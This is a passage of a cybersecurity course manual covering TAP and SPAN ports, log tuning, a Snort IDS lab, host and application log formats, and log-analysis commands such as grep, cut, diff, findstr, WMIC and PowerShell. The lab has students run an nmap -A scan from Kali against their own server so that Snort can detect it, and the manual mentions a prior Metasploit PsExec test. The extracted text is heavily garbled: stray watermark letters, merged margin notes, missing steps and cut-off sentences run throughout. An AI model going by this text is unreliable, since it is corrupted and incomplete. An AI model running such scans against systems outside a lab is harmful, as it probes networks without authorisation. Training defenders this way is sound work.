Since the TAP device is a separate appliance, it will not cause any frame timings to be altered or
packets to be dropped. Also, forensic data captured through a TAP device is admissible in court in
N
certain jurisdictions, whereas data captured from SPAN devices may not be.
Despite their performance and reliability issues, SPAN ports are still useful for monitoring low-
traffic network segments. Otherwise, TAP devices are the preferred option, as they don't cause the
o
e
ut
ib
tr
is
D
or
e
at
lic
Log Tuning
Whether you're collecting firewall logs, IDS/IPS logs, syslogs, or any type of logging data, you'll Log Tuning
D
often need to strike a balance between the volume of information and the usefulness of that
information. The consequences of failing to log enough pertinent data may be a reduced ability to
identify and correct problems, but logging too much data could lead to another set of issues.
ot
Excessive logging might increase network and processing overhead, and depending on how the data
is collected, it might take up too much storage memory on hosts. It might also make the task of
N
resource that you reluctantly wade through to only maybe find something of value. The tuning
process can take time, however, as you need to evaluate what logs weren't collected but should have
D
been, and what logs were collected but should not have been. Once you've reached a point where
you're confident you've achieved the right balance, log tuning will have made your job easier and
more productive.
ACTIVITY 7-2
Collecting Network-Based Security Intelligence
Data Files
e
C:\CNX0013Data\Collecting Cybersecurity Intelligence\snort.conf
ut
C:\CNX0013Data\Collecting Cybersecurity Intelligence\local.rules
Activity: Collecting
Network-Based Security Before You Begin
ib
Intelligence
You'll be using your Windows Server® 2019 computer for this activity, as well as your Kali Linux™
Note that if your network
virtual machine (VM). Snort has already been installed on the server.
configuration does not
tr
use 10.39.5.0/24, you
will have to change the Scenario
is
var HOME_NET value in One of the primary ways you intend to gather security intelligence in the Develetech network is to
snort.conf for students. employ an IDS. You decide to begin your investigation of IDSs by looking at Snort—an established,
D
respected, and free IDS. You'll run the system on your Windows Server and write some basic rules
to test its ability to detect port scans.
1. or
Set up Snort to begin detecting scans.
a) On your Windows Server, from the course data files, copy the snort.conf file to the C:\Snort\etc
directory, overwriting the file that is already there.
e
b) Copy the local.rules file to the C:\Snort\rules directory.
at
e
ut
ib
tr
is
D
The first detects SYN scans, the second detects ACK scans, the third detects XMAS scans, and the Explain the difference
fourth detects a web browser navigating to Facebook.
or
Each rule has a header and a body. The header includes the action, protocol, source IP address,
source port, direction, target IP address, and target port. The body must include at least an identifier
called a security identifier (SID) and a message called msg. Any line starting with a # is a comment
between the various
types of flags that might
be set in a packet, if
students are unfamiliar
e
with them.
line in Snort. For example, alert icmp any any -> $HOME_NET any (SID: 9000009;
at
msg: "ICMP Detected") would alert on every incoming Internet Control Message Protocol
(ICMP) packet it saw (primarily ping and traceroute). This would not be a very efficient rule, because
it would trigger all the time.
lic
The bottom four lines in the rule file limit the output of the four rules so they will only show the first
five alerts from a particular IP address every 30 minutes.
Note: There are many other optional fields to filter on in the body, but they
up
could fill a separate course. For extensive documentation and to check out
this free program, go to https://snort.org.
D
Note: HOME_NET is a variable that is set in your snort.conf file to the local
network IP addresses.
e) Close the local.rules file without saving.
ot
a) Open PowerShell by right-clicking the Start button and selecting Windows PowerShell (Admin).
b) At the prompt, enter cd C:\Snort\bin
This is the default directory where the Snort executable resides.
o
c) Enter .\snort.exe -W
D
d) Identify the index of the network interface that has your server's IP address.
e
Note: The correct index on your server may be different than what's shown in
ut
the screenshot.
e) Enter .\snort -c C:\Snort\etc\snort.conf -i# -l C:\Snort\log -A console,
ib
where # is the network interface index you just identified.
• The –c command tells Snort where to find the configuration file.
tr
• The –i# command tells Snort to capture on the specific interface.
• The –l command tells Snort to log its alerts and where to save them.
is
• The –A console command tells Snort to additionally send the alerts to the console. You would
not use this option normally because it slows down detection and may cause Snort to drop
packets in a busy network. Sending data to the console is a good way to test your sensor.
D
When you execute the command, the console should show a large number of actions ending with
"Commencing packet processing." This indicates Snort is actively detecting intrusions.
or
e
at
lic
up
D
ot
N
f) Switch to your Kali Linux VM, open a terminal prompt, and enter sudo nmap –A 10.39.5.#,
where # is the last number in the IP address of your Windows Server.
o
Note: –A combines a SYN scan, ACK scan, and operating system discovery.
D
g) Allow the scan to complete, and then check the Snort command prompt on your Windows Server
2019 computer.
There should be five SYN scan alerts, five ACK scan alerts, and five XMAS scan alerts.
h) With the PowerShell window active, press Ctrl+C to end the capture.
Notice that Snort displays a summary data about the attack.
e
ut
ib
tr
is
D
If students are unsure,
3. How many TCP packets did Snort examine? have them run
4.
or
A: Answers will vary, but the number will be large, typically in the thousands.
Why do you think there were only five instances of each alert in the traffic?
Wireshark on the server
as they do the Nmap
scan.
e
A: The limits placed in the rules file show only the first five instances of each alert within a 30-minute
period.
at
A: To not overwhelm your IDS with traffic and fill your logs with just a few loud attacks like this one.
Note: In this mode, Snort captures entire packets and saves them in a file that is
readable with Wireshark or other protocol analyzers.
ot
e) Examine the captured packets, noting those containing FIN, PSH, and URG flags in particular.
e
ut
ib
tr
is
Note: XMAS scans are a way to evade some firewalls that track TCP
sessions. They are malformed packets containing the PuSH, URGent, and
D
FINish flags.
8. Were all of the XMAS scans identical? If not, how were they different?
or
A: No, some have just FIN, PSH, and URG, while the others include the SYN flag. Three of them are
marked by Wireshark as retransmissions.
e
9. Disable the alert limits and rerun the Snort capture.
at
11.After the scan completes, end the Snort session by pressing Ctrl+C and look
All of the scans from
Nmap may not run at the statistics.
because it remembers
the results from the last
scan, but the difference
should still be obvious.
12.Isthe number of TCP packets (or other statistics) significantly different from
the previous scan?
A: No, the numbers are about the same. Snort just alerted on more of the malicious traffic than
before.
13.Why is it important to carefully tune and limit your IDS rules in a production
environment?
A: To limit the number of alerts that are logged for the same attack and make sure that actual attacks
e
do not get lost in false positives. Storage space can also be a concern if a great deal of data is
logged over a period of time.
ut
14.Close PowerShell and Wireshark.
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D
TOPIC C
Collect Data from Host-Based Intelligence
Sources
Now that you've collected intelligence from network-based sources, you can turn your attention to
e
host-based sources.
ut
Operating System Log Data
ib
You don't need to spend Systems such as Microsoft® Windows, Apple® macOS®, and Linux keep a variety of logs as users
too much time teaching and software interact with the system. The format of the logs varies depending on the system.
through each log format Information contained within the logs also varies by system, and in many cases, the type of
tr
in depth; you might information that is captured can be configured.
instead highlight the
System logs contain information such as:
is
differences between
each format. • Valid and invalid authentication attempts and resource use, such as creating, opening, or deleting
Operating System Log files.
D
Data
• When applications and services are started and stopped, and any errors that occurred.
• Remote access.
or
• Driver failures and hardware problems.
• Account and security policy changes.
Many of these logs contain information that can be useful in detecting or responding to security
e
problems. In many cases, administrators refer to these logs only when there is a problem, relying on
default configurations to maintain the logging they need. However, you can customize the system
at
logging feature or install third-party logging tools to collect more (or more useful) information. Of
course, this must be done in advance to take advantage of it.
lic
System logs are helpful when investigating problems involving a specific host. For example, if an
NIDS reveals an attack against a particular computer, the system logs for that computer could be
analyzed to determine if a user was logged in to the computer when the attack occurred.
up
The next lesson operating system. This can be everything from an application crashing to a user logging in to the
discusses Event Viewer system. As such, Windows can record thousands of events over a period of weeks, depending on
and goes into more how often the system is used and for what purpose. Typically, events provide information that can
ot
detail about Windows be valuable to the troubleshooting process. These events can also be used as security intelligence to
event logging. ascertain exactly what happened on a system at a certain point in time.
N
When events are generated, they are placed into log categories. These categories describe the general
nature of the events or what areas of the OS they affect. The five main categories of Windows event
logs are:
o
• Application: Events generated by applications and services, such as ones failing to start.
D
e
Syslog Data
ut
The syslog format has become a de facto standard for logging in Unix-like systems, such as Linux. Syslog Data
ib
Syslog logging is typically provided through a simple centralized logging infrastructure that provides
a common interface for log entry generation, storage, and transfer. Syslog is a TCP/IP protocol and
tr
can run on nearly any operating system. It is a bare-bones method used to communicate logs to
another system. It usually uses UDP port 514.
is
The typical syslog infrastructure consists of:
• Clients: Services and applications that need to log events send a message to a server, which may
D
be on a different host computer.
• Server: The syslog server listens for messages sent over the network.
• Storage: The server may store messages in flat files or in a database.
or
• Management and filtering software: Log management or filtering software accesses records in
storage and provides tools for filtering, viewing, or managing data.
Clients identify the importance or priority of each logging message by including a code for facility
e
and severity:
• Facility identifies the affected system by using a short keyword such as "kern" (operating system
at
kernel), "mail" (mail system), or "auth" (authentication or security). The facility may also be
shown as a number from 0 to 23, each of which maps to an affected system (e.g., "kern" maps to
lic
0).
• Severity values are a number from 0 (most critical) to 7 (not critical).
These codes help security analysts and analysis software determine which messages should be
up
handled most quickly. For example, you might configure a monitoring service to send a notification
to the administrator for all operating system kernel messages of severity levels 1 or 0.
Note: In order for facility and severity to appear directly in the syslog, you may need to
D
e
ut
ib
tr
Figure 7-11: Sample syslog data. Most entries have a severity of 6, meaning the entry is
is
informational. A facility of 3 refers to system daemons.
D
Syslog Drawbacks
The original syslog protocol has some drawbacks. Using UDP delivery protocols does not ensure
delivery, so messages could be lost in a congested network. Also, it does not provide basic security
or
controls to ensure confidentiality, integrity, and availability of log data. Messages are not encrypted
in transit or in storage, and any host can send data to the syslog server, so an attacker could cause a
DoS to flood the server with misleading data. A man-in-the-middle attack could destroy the integrity
e
of message data.
In response to these shortcomings, newer syslog implementations introduced security features,
at
many of which are captured in the Requests for Comments (RFC) 3195, 5424, 5425, 5426, which
include:
lic
• The ability to use TCP for acknowledged delivery, instead of unacknowledged delivery over
UDP (port 514). There is no consistent TCP port that is used.
• The ability to use Transport Layer Security (TLS) to encrypt message content in transit. This uses
up
• Protecting the integrity of message content through authentication and a hashing algorithm such
as Secure Hash Algorithm (SHA).
Syslog implementations may also provide additional features beyond those specified in the RFCs,
ot
such as message filtering, automated log analysis capabilities, event response scripting (so you can
send alerts through email or text messages, for example), and alternative message formats (such as
SNMP).
N
Application Logs
o
Application Logs In addition to system-level logs, you can configure and monitor application logs to obtain more
D
specific information about activities performed on the host. This includes browsers, collaboration
tools, and other end-user applications; databases; financial applications; custom business
applications; and other applications critical to the organization or that contain sensitive information.
It also includes services such as email servers, Simple Mail Transfer Protocol (SMTP) gateways, file
servers, web servers, DNS servers, and Dynamic Host Configuration Protocol (DHCP) servers.
Some applications provide their own logs, while others use system logs to record data.
Some information, particularly for applications that use encrypted communication, can only be
logged by the application itself. For this reason, application logs can be useful for auditing and
compliance, and for investigating security incidents related to specific misuse of application data.
Unfortunately, application logs tend to be in proprietary formats, with highly contextual data that
makes an analysis more complicated.
The following are some of the types of information you might obtain from application logs.
e
Client requests and Server or client applications typically log a high-level description of each
server responses request and response (though not the actual content), which can help to
ut
reconstruct communication timelines, determine who made each request,
and provide the type of response returned. Server applications can
provide detailed logging, such as the sender, recipients, title, and
ib
attachments for each email, or each URL requested and the response
provided by a web server. Business applications can identify which
tr
financial records were accessed by users.
Account information Server applications may log events concerning specific user accounts,
is
such as successful and failed logins and account changes (such as
creation, deletion, and privilege assignment). In addition to identifying
D
security events such as brute-force password guessing and escalation of
privileges, account information can be used to identify who has used the
application and when each person has used it.
Usage information
or
Information about application usage, such as the number of transactions
within a certain time period or the transaction size (such as the size of an
email message), can be helpful when monitoring security. A sudden
e
increase in the size or frequency of certain transactions might indicate
specific types of security threats.
at
Significant operational Applications can log events such as an application startup and shutdown,
events application failures, and major application configuration changes. This
lic
preset baseline.
Anti-malware logs Anti-malware/antivirus applications may also provide useful insights into
how malicious software impacts a system.
ot
A DNS server may log an event each time it handles a request to convert between a domain name DNS Event Logs
and an IP address.
o
DNS event logs can contain a variety of information that may provide useful security intelligence,
D
such as:
• The types of queries a particular computer has made to DNS.
• A list that can be searched for either IP addresses or domains to identify computers that are in
communication with suspicious sites.
• Statistical anomalies such as spikes or consistently large numbers of DNS lookup failures, which
may point to computers infected with malware, misconfigured, or running obsolete or faulty
applications.
e
ut
ib
Figure 7-12: A DNS event log.
tr
SMTP Logs
is
SMTP Logs Simple Mail Transfer Protocol (SMTP) is a protocol used in email communications. Mail
D
applications send messages in SMTP format to their relay server (e.g., an on-premises Exchange
server), which then forwards the SMTP-formatted message to the recipient's mail server (e.g., one of
Gmail's servers). The recipient's mail server then typically formats the message in Post Office
recipient. or
Protocol 3 (POP3) or Internet Message Access Protocol (IMAP) before forwarding it on to the
SMTP logs are typically formatted in request/response fashion: the local SMTP server sends a
e
request to the remote SMTP server to open a port for communications. The remote SMTP server
responds and, if successful, the local server begins forwarding the client's message. The logs at this
at
point typically record the time of request/response, the address of the recipient, and the size of the
message.
lic
Another component of SMTP log entries is the status code. Status codes indicate a remote server's
acceptance or rejection of a request or message. For example, the remote server may send code 220
after a request, indicating that the server is ready. After the local server provides the message
up
information, the remote server responds with code 250 to indicate the message itself is accepted.
Likewise, you can use SMTP logs to collect errors in transmissions that may indicate insecure email
activity. Code 421 in a remote server's response indicates the service is not available, and codes 450,
451, and 452 each indicate different issues with sending the actual message. Repeated failure entries
D
like these could be the sign of a DoS condition on either the remote or local SMTP server.
Note: For a full list of SMTP reply codes, navigate to www.serversmtp.com/en/smtp-error.
ot
N
o
D
Figure 7-13: An SMTP log entry example. A session with a remote server has already been
established, but the remote server is unable to deliver the message.
HTTP Logs
Web servers are typically configured to log HTTP traffic that encounters an error or traffic that HTTP Logs
matches some predefined rule set. Most web servers use the Common Log File (CLF) format to
record the relevant information. The CLF standardizes fields so they appear in the following order:
• The IP address of the client making the request.
• The RFC 1413 identity of the client (rarely used).
• The user ID of the client when authenticated on the site.
e
• The date and time the request was received, as well as the time zone.
• The request method used by the client (e.g., GET or POST) and the resource requested.
ut
• The HTTP status code of the server's response.
• The size, in bytes, of the resource returned to the client.
ib
tr
is
D
or
Figure 7-14: An example of an HTTP log entry. The hyphens indicate information that is not
available.
e
The status code of a response can reveal quite a bit about both the request and the server's behavior.
at
Codes in the 400 range indicate client-based errors, whereas codes in the 500 range indicate server-
based errors. For example, repeated 403 ("Forbidden") responses may indicate the server is rejecting
lic
a client's attempts to access resources they are not authorized to. A 502 ("Bad Gateway") response
could indicate that communications between the target server and its upstream server are being
blocked, or that the upstream server is down.
up
HTTP Headers
In addition to status codes, some web server software also logs HTTP header information for both
ot
requests and responses. This can provide you with a better picture of the makeup of each request or
response, such as cookie information and MIME types. Another header field of note is the User-
N
Agent field, which identifies the type of application making the request. In most cases, this is the
version of the browser the client is using to access a site, as well as the client's operating system.
However, the User-Agent field is not always a reliable indicator of the client's environment.
o
SSL/TLS Debugging
D
In some cases, SSL/TLS connections may not be working as intended. The relevant debugging
information is typically not included in standard HTTP web logs, but in separate SSL/TLS logs,
assuming they are enabled on the server. However, these logs may either be too verbose or not
provide enough information. For example, an SSL/TLS log may record a failed handshake, but be
unable to clearly indicate why the handshake failed. In these cases, it may be more beneficial to use a
packet analyzer like Wireshark to capture and read SSL/TLS traffic in a human-readable format.
Wireshark enables you to decrypt the captured traffic if you provide the corresponding
cryptographic keys.
FTP Logs
FTP Logs File Transfer Protocol (FTP) servers log information differently based on the software they run, but
many conform to the fields set by the World Wide Web Consortium (W3C). These fields identify
the client and server in each transaction, as well as provide additional details about the transaction
itself. Other than the standard date, time, and client/server IP address fields, the following W3C
e
fields are also available and relevant for security intelligence purposes:
ut
• cs-username: The user name the client used to authenticate to the server.
• cs-method: The method or action taken by the client or server (e.g., ControlChannelOpened).
• cs-status: The protocol status code. FTP has its own set of status codes.
ib
• sc-bytes: The amount of bytes sent by the server.
• cs-bytes: The amount of bytes received by the server.
tr
• x-session: The unique ID assigned to the session.
• x-fullpath: The relative path from the FTP root directory to any directory specified in the action.
is
• x-debug: Additional information about the protocol status code (e.g., code 530 may produce
"User not signed in").
D
or
e
at
lic
SSH Logs
ot
SSH Logs Secure Shell (SSH) logs are not necessarily as standardized as HTTP or FTP logs. Nevertheless,
most SSH server software comes with at least some logging functionality that records basic client/
server session information. Each event in an SSH log usually concerns session establishment and
N
termination rather than the actual details of a connection. After all, SSH is an encrypted protocol
meant to protect remote shell sessions from eavesdropping. So, logs often include:
o
• The date and time that each event took place on the server.
• The user name the client is using to connect.
D
e
ut
Figure 7-16: An SSH log.
ib
SQL Logs
tr
Databases that run on Structured Query Language (SQL) log daily server operations and user SQL Logs
interaction with the servers. Like a system event log, SQL servers record events with fields like date,
is
time, and the action taken. Normal actions can include server startup, individual database startup,
database cache clearing, and more. SQL logs also record error events, like databases failing to start
or shutting down unexpectedly.
D
SQL servers also record user interactions that can potentially be useful as security intelligence.
Administrators typically access SQL servers through built-in remote management consoles, and each
or
connection attempt, success, and failure is logged. Like any other system access log, you can use
these entries to determine whose account has been used to exfiltrate or tamper with data.
From a standard user perspective, SQL servers can also log individual query strings sent to the
databases. Other than the date, time, and user who sent the query, these logs also record:
e
• The query operation performed.
at
Retrieving information on individual queries can provide you with actionable intelligence in the face
of an SQL injection attack or unauthorized modification of a database using hijacked credentials.
Logging all queries can significantly increase overhead, however, so log tuning is a must in this case.
up
D
ot
N
o
D
ACTIVITY 7-3
Collecting Host-Based Security Intelligence
e
You'll be using Log Parser and Log Parser Studio, tools developed by Microsoft that enable you to
run queries on data. Both have already been installed on your server.
ut
Activity: Collecting Host-
Based Security Scenario
ib
Intelligence
You are not satisfied with looking through log files entry by entry, so you decide to try Microsoft's
Log Parser Studio to automate queries to your host-based log files. You could manually do all of
tr
these queries on your own, but a tool like this puts them all in one place. This is not as good as a
SIEM, but it will do until you get one.
is
1. Export your Windows Server logs.
D
a) On your server, from Server Manager, select Tools→Event Viewer.
b) In the center pane, observe how many events of various types are listed.
or
c) Note the number of errors your server has logged in the past 24 hours.
This depends on the server's activity.
d) In the console tree, expand Custom Views.
e) Select Administrative Events.
e
at
lic
up
D
ot
N
o
D
f) In the Actions pane on the right, select the Save All Events in Custom View As link.
e
ut
ib
tr
is
D
g) Name the file ServerEvents and save it on the desktop.
or
e
h) In the Display Information dialog box, verify the No display information radio button is selected.
i) Select OK.
at
Use Log Parser and Log Parser Studio to run queries on your saved log file.
lic
2.
a) On the desktop, open the LPSV2.D1 folder.
b) Right-click the LPS.exe icon and select Run as administrator to start Log Parser Studio.
up
e
ut
ib
c) In the new tab, select the red ! button to run the query.
d) Right-click the Q1 tab and select Rename Tab.
tr
e) Name the tab AppErrors and press Enter.
f) Select the Library tab.
is
g) Double-click EVENTS: Find all Remote Logons.
h) Select the red ! button to run the script.
D
i) Rename the tab RemoteLogon
Note: It may take a few moments for the script to finish running.
Time permitting, have A: Several of these remote logon events were created when you remotely accessed the server using
students run additional the Metasploit PsExec exploit during the penetration test activity.
queries on the log file.
lic
5. What is the value of this tool beyond using Event Viewer alone?
A: Answers will vary. Log Parser can combine multiple logs, even from different devices. It also
automates many of the queries you would otherwise have to do by hand.
up
Summary
In this lesson, you collected cybersecurity intelligence that can be used in later analysis efforts. You
prepared by deploying a collection strategy, and then you collected data from a wide range of
sources, including network-based and host-based logs. Understanding the purpose, characteristics,
and formatting of these intelligence sources is essential to gathering exactly what information you
need to detect and mitigate incidents.
e
Encourage students to
What types of retention policies is the data in your organization or an use the social
organization you're familiar with subject to? How does this affect collection
ut
networking tools
efforts? provided on the CHOICE
A: Answers will vary. Students working in particular sectors or industries, such as healthcare, will need to Course screen to follow
ib
up with their peers after
comply with applicable laws and regulations that define exactly how long to retain data like PII. Even
the course is completed
without legal pressure, organizations will also likely adopt their own retention policies based on
for further discussion
industry best practices, while also considering the sensitivity of each type of data. Either way,
tr
and resources to support
students may find that this reduces the amount of actionable intelligence they collect or store, while continued learning.
others may be unaffected as they don't get much use out of years-old data.
is
How does your organization or an organization you're familiar with tune logs to
optimize the amount of useful intelligence they provide?
D
A: Answers will vary. Potential log tuning tasks include: automatically configuring logs to roll over to new
files after reaching a certain size or after a certain period of time; logging only a certain amount of
or
events over a period of time; eliminating extraneous fields from logs, such as a destination field that is
always the same for every event; implementing standardized log formats to make it easier to correlate
logs from different appliances; and more.
e
Note: Check your CHOICE Course screen for opportunities to interact with your classmates,
peers, and the larger CHOICE online community about the topics covered in this course or
at
other topics you are interested in. From the Course screen you can also access available
resources for a more continuous learning experience.
lic
up
D
ot
N
o
D
e
Lesson Time: 2 hours
ut
ib
tr
Lesson Introduction
is
Now that you've collected security intelligence from a wide variety of log-based sources, you
can begin to dissect those logs to reveal key information about potential threats and
D
vulnerabilities. Log analysis is a powerful process that can turn your security intelligence into
actionable data.
Lesson Objectives or
e
In this lesson, you will:
at
• Analyze a wide array of log data by using common Windows- and Linux-based security
tools.
• Incorporate a SIEM system into the analysis process.
lic
up
D
ot
N
o
D
TOPIC A
Use Common Tools to Analyze Logs
Analysis efforts can be strained if they're done manually, but plenty of tools are out there to make
your job easier. These tools can automate the analysis process and reveal useful information that you
may not have seen otherwise.
e
ut
Preparation for Analysis
Preparation for Analysis As you attempt to transform raw data into actionable intelligence, at some point between data
ib
collection and data analysis, you'll need to prepare your raw data to get it into a form that is useful
and efficient for analysis. To some extent, this may be done for you by your automation tools. You
may also have to manually prepare some data using capabilities provided by your logging and tracing
tr
tools.
is
A variety of skills can help you in the process of preparing data. Programming, shell scripting, or
batch file writing skills enable you to develop automation tools. The ability to write regular
expressions can help you search for patterns. Even tools like a word processing or spreadsheet
D
program may be useful in this process. Of course, the ability to use tools such as security
information and event management (SIEM) and log analysis tools is also helpful.
• Filter out unnecessary or duplicate data: Some data may not be applicable to your analysis
and will slow down your processing.
• Combine sources: Different logs record different information, which may provide significant
D
how a situation unfolded, you need to be able to effectively view events in a timeline sequence.
• Normalize data formats: Different formats may be used for data, such as dates and times, and
N
information may be combined or presented differently in different log sources. Analysis is easier
when data is presented consistently.
• Store data securely: Once you have prepared the data for analysis, you'll need to ensure that it is
o
stored securely. Destroy any temporary files you may have created in the process. Separate from
any analysis or investigation you are conducting, your standard operating procedures should
D
ensure that the original logs are stored securely in support of applicable laws and compliance
regulations.
to form a comprehensive suite of log analysis software. In other words, there's not necessarily one
monolithic tool that will enable you to do anything you could possibly need when it comes to
analyzing logs.
In this topic, log analysis tools are divided into the following categories:
• Linux® tools:
• grep
• cut
• diff
e
• Windows® tools:
ut
• findstr
• Windows Management Instrumentation Command-line (WMIC)
ib
• Event Viewer
• Scripting languages:
• Bash (Linux)
tr
• Windows PowerShell™
is
The grep Command
D
In Unix-like operating systems, the grep command searches text files for specific strings supplied by The grep Command
the user. This enables you to search the entire contents of a text file for a specific pattern, and
display that pattern on the screen or dump it to another file. This is an extremely powerful and
This searches the text file iplog.txt for all lines containing some variation of the text "10.39.5.10"
and prints those lines to the terminal.
lic
The grep command is essential in analyzing Linux logs because it gives you the ability to pinpoint
the exact information you're looking for, regardless of how large and unwieldy the entire log file
appears to be. Some log analysis–related use cases for grep include:
up
• Searching for specific IP addresses or domains to determine the source or destination of traffic.
• Searching for specific dates and times during which an event may have occurred.
• Searching multiple log files in one search operation.
ot
N
o
D
Figure 8-1: Searching the Linux syslog for entries with the NetworkManager process.
Options
Other than its default behavior, grep provides the following options.
Option Description
-i By default, search strings in grep are case sensitive. This option ignores
case sensitivity.
-v Reverses the grep command's default behavior, returning only lines that
do not match the given string.
e
-w Treats search strings as discrete words. By default, the string "add" will
ut
also return "address". With this option, the string "add" will only return
instances of the word "add" by itself.
ib
-c Returns the total count of matching lines rather than the lines themselves.
-l Returns the names of the files with matching lines rather than the lines
tr
themselves. Primarily used in multi-file grep searches.
-L Similar to the behavior of the -v option, in that it returns the names of
is
files without matching lines.
-r Searches recursively within the given directory. This is useful when the
D
files you're searching are in different subdirectories.
else that might end up being too much visual "noise." This is where the cut command comes in
handy. The cut command enables you to specify which text on a line you want to remove from
your results so they're easier for you to read. This can eliminate the frustration and inefficiency of
lic
The other major use of cut is with the -f and -d flags. Take the following example:
cut -d " " -f1-6 syslog
ot
The -d flag creates a delimiter, or a character that acts as a separator. In this case, the delimiter is a
space. The -f flag is similar to the -c flag, but instead of cutting by characters, it cuts by whatever
delimiter you specified. So, the aforementioned example will return the first six groups of characters
N
separated by a space.
o
D
e
ut
ib
Figure 8-2: Using a delimiter to cut the syslog so that it shows only the date, time, source, and
process related to an event.
tr
Note: The Kali Linux syslog that this example was taken from separates the month and the day
by two spaces. In other Linux distributions, you may only need to cut the first five groups to get
is
the same results.
D
The diff Command
or
The diff command takes two text files and returns how those files differ. It does this line by line,
similar to how grep and cut work with individual lines. The actual output of diff displays each line
that is not the same, along with a summary of where those lines are and how they need to be
changed to make the first file identical to the second file.
The diff Command
e
In the following example, syslog has the following three lines: The logs in these
at
3. Mar 13 server00
And syslog.1 has the following three lines:
1. Feb 11 localhost
up
2. Feb 11 localhost
3. Mar 13 localhost
Using diff syslog syslog.1 will return the following:
D
1a2
> Feb 11 localhost
ot
3d3
< Mar 13 server00
The 1a2 code means that after line 1 in the first file, line 2 from the second file needs to be added.
N
Feb 11 localhost is the line in question. The 3d3 code means that you need to delete line 3 in the
first file so that line 3 matches up in both files. Mar 13 server00 is the line in question.
o
D
e
ut
ib
tr
is
Figure 8-3: The previous example in action.
D
Note: You can also output the results side by side in two columns using the -y flag.
or
The diff command is useful for log analysis when you need to correlate actions across multiple log
files in different systems. You can use time values with diff to pinpoint when an event happens,
and to see if other logs recorded that same event around the same time. You can also use diff to
e
ensure that logs haven't been tampered with by comparing one log with a backup.
at
Consider informing
students that, in some Piping
cases, the order in which
Linux commands like grep, cut, and diff are further beneficial to security analysts because they
lic
Figure 8-4: In this example, the grep command feeds into the cut command, producing a more
D
focused output.
command has a slightly different syntax than grep, but it includes most of the same basic options.
For example, you can use the /i option to specify case insensitivity.
The following is an example of the findstr command:
findstr /i "ICMP" C:\Windows\system32\LogFiles\Firewall\pfirewall.log
This searches a Windows Firewall log for instances of Internet Control Message Protocol (ICMP)
packet entries.
e
ut
Figure 8-5: The previous example in action. The results show four different entries of ICMP
ib
packets being allowed through the firewall.
tr
On Windows, the find command is an older version of the findstr command. They are very
is
similar, but one major difference is that find does not support regular expressions. Also, find is
not compatible with Windows PowerShell and must be run from the traditional Windows command
prompt (cmd.exe).
D
Note: The Windows find command should not be confused with the Linux find command,
which is used to locate files in a directory.
also be helpful to security analysts who need to review log files on a remote Windows machine. The
main alias you can use in WMIC to review logs is NTEVENT. NTEVENT will, given a certain input,
return log entries that match your parameters.
lic
For example:
wmic NTEVENT WHERE "LogFile='Security' AND EventType=5" GET
SourceName,TimeGenerated,Message
up
This will look in all Security event log entries whose events are type 5 (audit failure). It will then
return the source, the time the event was generated, and a brief message about the event. This can
be useful for identifying specific events based on their details, without actually being at the target
D
Event Viewer
Event Viewer is the main graphical hub for viewing event logs on a Windows computer. As you've Event Viewer
seen, Windows logs events in one of several different categories, and Event Viewer provides views
for each category. Several of these event categories further classify events by their severity:
• Information: Successful events.
• Warning: Events that are not necessarily a problem, but may be in the future.
• Error: Events that are significant problems and may result in reduced functionality.
• Audit Success/Failure: Events that indicate a user or service either fulfilled or failed to fulfill
the system's audit policies. These are unique to the Security log.
Beyond general category and severity, Event Viewer displays detailed information for each log entry,
including the subject of the entry; details of the error (if there is one); the event's ID; the source of
the event; a description of what a warning or error might mean; and more.
The real power of Event Viewer is that it gives you several easy-to-use options for managing your
e
logs. You can filter logs by many different characteristics, like date and time, severity, event ID,
source, and much more. Filtering is crucial in helping you avoid the clutter of thousands of events
ut
that get logged. Additionally, you can also create custom views within Event Viewer so it's easier to
monitor only the events you care about. You can also adjust log properties, like the maximum size
of each log, and you can create backups of logs in case of data loss. You can also clear logs manually
ib
when you no longer need them.
tr
is
D
or
e
at
lic
up
D
Bash
ot
Bash Bash is a scripting language and command shell for Unix-like systems. It is the default shell for
N
A deeper dive into most Linux distributions, and has its own command syntax. Tools like grep, cut, and diff are built
programming into the Bash shell.
fundamentals is beyond
Beyond individual command entry, Bash is also powerful in that it can run complex scripts. Similar
the scope of this course.
o
to standard programming languages, Bash supports elements like variables, loops, conditional
statements, functions, and more. Bash scripting can aid the log analysis process by automating
D
various commands—the analyst can write the script and execute it all at once, and they can use this
same script over and over at different points in time. Because time is such a precious resource for
any cybersecurity professional, creating custom scripts for an environment is a great way to optimize
daily log analysis tasks.
The following is an example of a simple Bash script named nm-script that uses some of the
commands already discussed:
#!/bin/bash
echo "Pulling NetMan entries..."
grep "NetworkManager" /var/log/syslog | cut -d " " -f1-6 > netman-log.txt
echo "NetMan log file created!"
The first line of the script indicates what type of interpreter the system should run, as there are
many different scripting languages. The echo lines simply print messages to the console. The grep
line pipes in cut to trim the syslog as before, and outputs the results to a file called netman-log.txt.
Note: In order to run a script in Linux, that script file must have the execute bit (x) set on it.
e
ut
ib
tr
is
D
or
e
at
Figure 8-8: The previous script runs and the output is displayed.
lic
Note: Windows 10 includes a Linux subsystem that supports the Bash shell.
D
Z Shell
The Z shell, also called Zsh, is an updated version of the Bash shell. The Z shell has been the
ot
default shell of Kali Linux since version 2020.4, and the default shell of macOS since Catalina
(2019), both of which previously defaulted to Bash. The syntax of the Z shell is essentially the same
as Bash, so your scripts will work in both environments without modification.
N
Windows PowerShell
o
Windows PowerShell is a scripting language and shell for Microsoft® Windows that is built on Windows PowerShell
D
the .NET Framework. Microsoft started packaging PowerShell with Windows with the release of
Windows 7 and Windows Server® 2008 R2, and it is the default shell on Windows 10 and 11, as well
as Windows Server 2019 and 2022. PowerShell is often used by administrators to manage both local
and remote hosts as it integrates with Windows Management Instrumentation (WMI). PowerShell
offers much greater functionality than the traditional Windows command prompt.
PowerShell functions mainly through the use of cmdlets, which are specialized .NET commands
that interface with PowerShell. These cmdlets typically take the syntax of Verb-Noun, such as Set-
Date to change a system's date and time. Like other command shells, the cmdlet will take whatever
valid argument the user provides.
PowerShell is also able to execute scripts written to its language. Like Bash, the PowerShell scripting
language supports a wide variety of object-oriented programming elements. These scripts provide
the same benefit as before—the ability to automate log analysis tasks to cut down on the time it
takes to constantly type out a command. Also, since there are so many cmdlets available to
PowerShell, creating multiple custom scripts will help you avoid having to remember each cmdlet or
constantly look them up.
e
Consider pointing out to The following is an example of a PowerShell script named log-fail-script.ps1:
students, if they haven't Write-Host "Retrieving logon failures..."
ut
noticed, that PowerShell Get-EventLog -Newest 5 -LogName Security -InstanceId 4625 | Select
supports piping.
Timewritten, Message | Out-File C:\log-fail.txt
ib
Write-Host "Log created!"
